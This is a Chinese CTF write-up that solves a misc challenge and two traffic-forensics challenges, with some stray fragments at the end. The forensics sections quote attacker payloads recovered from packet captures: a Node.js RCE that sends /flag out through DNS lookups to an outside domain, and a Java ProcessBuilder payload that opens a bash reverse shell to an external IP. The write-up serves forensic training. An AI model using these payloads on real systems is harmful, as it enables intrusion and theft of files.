太好了,又水一集
挺难的,不过好在还是有签到题
代码中的秘密
misc
但是靶机
不过是签到:
查看robots.txt 中发现了 clue。 提示网站可能存在 RIPS 扫描器的遗留文件。访问 /rips/ 路径后,利用 RIPS 扫描器的功能对服务器 web 根目录(/var/www/)进行扫描,从扫描结果的文件列表中发现了一个异常文件 a6e97102-1f98-4c21-a6e1-26611c53b79b.php。访问,获得 flag。
flag{a6e97102-1f98-4c21-a6e1-26611c53b79b}
静影寻踪
取证
描述:于凝固的数字记忆中,追溯那些悄然消逝的涟漪与未言之约。
咱也不懂:
FLAG 消失之谜
取证(那我问你)
描述:我们刚刚监测到一次针对 Web 服务器的精准攻击——攻击者利用漏洞成功窃取了服务器上的敏感文件FLAG。 幸运的是,我们捕获了攻击期间的完整网络流量,但 FLAG 已被攻击者通过某种方式隐藏并外传。
核心逻辑:Web 漏洞利用 (RCE) -> 数据编码 (Base64) -> 通道外带 (DNS OOB)。
1. 攻击流量发现
首先分析 HTTP 流量,寻找攻击入口。通过搜索 POST 请求或 exec、system 等关键字,定位到第 9780 帧附近的恶意请求。
Payload 分析:
攻击者发送了一个 JSON 数据包,其中利用了 Node.js 的 child_process 模块执行系统命令。
process.mainModule.require("child_process").execSync("cat /flag | base64 | tr -d '=' | tr -d '\\n' | xargs -I {} ping -c 1 {}.c07545bc.digimg.store")
行为判定:这是一次利用 Node.js 环境进行的远程代码执行(RCE),并利用 DNS 协议进行数据外带。
2. 数据提取 (DNS Exfiltration)
攻击者将 /flag 的内容进行了 Base64 编码,并移除了填充符 = 和换行符,然后将其拼接到 digimg.store 的子域名中进行 ping 操作。这会导致受害服务器向 DNS 服务器发送查询请求。
过滤 DNS:
在 Wireshark 中使用过滤器 dns 或直接搜索域名 digimg.store。
提取数据:
找到 DNS Query Name 字段,提取主机名前缀:
ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTR
3. Flag 还原
对提取的字符串进行 Base64 解码:
Base64: ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTR
ASCII: flag{b8efb2ca-63e8-4db6-aea5-6c6d34f03754
由于 Base64 编码在传输过程中可能丢失了最后的 fQ== (即 }) 部分(或者被截断),根据 UUID 的标准格式(8-4-4-4-12)验证,Guid 部分 b8efb2ca-63e8-4db6-aea5-6c6d34f03754 是完整的。因此,只需补上最后的 }。
一发入魂
取证。懒得搞了,反正也没奖
描述:这位黑客老哥属实是个讲究人,全程只发一个 HTTP 包,深藏功与名。快来围观这“一发入魂”的骚操作,顺便把 FLAG 领走
flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}
1. 初步分析
拿到流量包,题目提示“黑客全程只发一个 HTTP 包”,这暗示我们可以通过过滤 HTTP POST 请求来快速定位攻击入口。
在 Wireshark 中使用过滤器:
http.request.method == "POST"2. 发现攻击流量
筛选后,发现唯一的 POST 请求是发往/ScriptEngine/scriptEngineEval.do的。这是一个典型的命令执行漏洞利用特征。
查看该数据包的实体内容(URL解码后):
var pb = new java.lang.ProcessBuilder("bash", "-c", "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ==}|{base64,-d}|{bash,-i}"); pb.redirectErrorStream(true); var p = pb.start(); ...这段 Payload 利用 Java 的ProcessBuilder执行了一段 Base64 编码的 shell 命令。
3. 解码攻击载荷
提取其中的 Base64 字符串YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ==进行解码,内容为:
bash -i >& /dev/tcp/47.76.182.195/5353 0>&1这证实攻击者成功向47.76.182.195:5353建立了一个反弹 Shell。
4. 追踪 TCP 流
既然攻击者已经拿到了 Shell,后续的读取 Flag 操作肯定是在这个反弹连接(TCP流)中进行的。
在 Wireshark 中:
- 找到目标端口为
5353的数据包。 - 右键点击相关条目 ->Follow->TCP Stream。
在 TCP 流的数据中(通常在流的末尾),可以看到攻击者执行了如下命令:
echo "aGV4ZHVtcCAtdmUgJzEvMSAiJS4yeCInIC9mbGFn" | base64 -d | bash将这段 Base64 解码,发现攻击者执行的是:
hexdump -ve '1/1 "%.2x"' /flag这意味着/flag文件的内容被转换成了十六进制纯文本进行回显。
5. 获取 FLAG
在 TCP 流的响应中,找到对应的十六进制输出:666c61677b34626138616132322d363730332d343130372d396136382d3966336339326363636432347d
将其从 Hex 转换为 ASCII 字符串:
flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}
咕咕嘎嘎!呃~
.模型验证与优化)
)
)
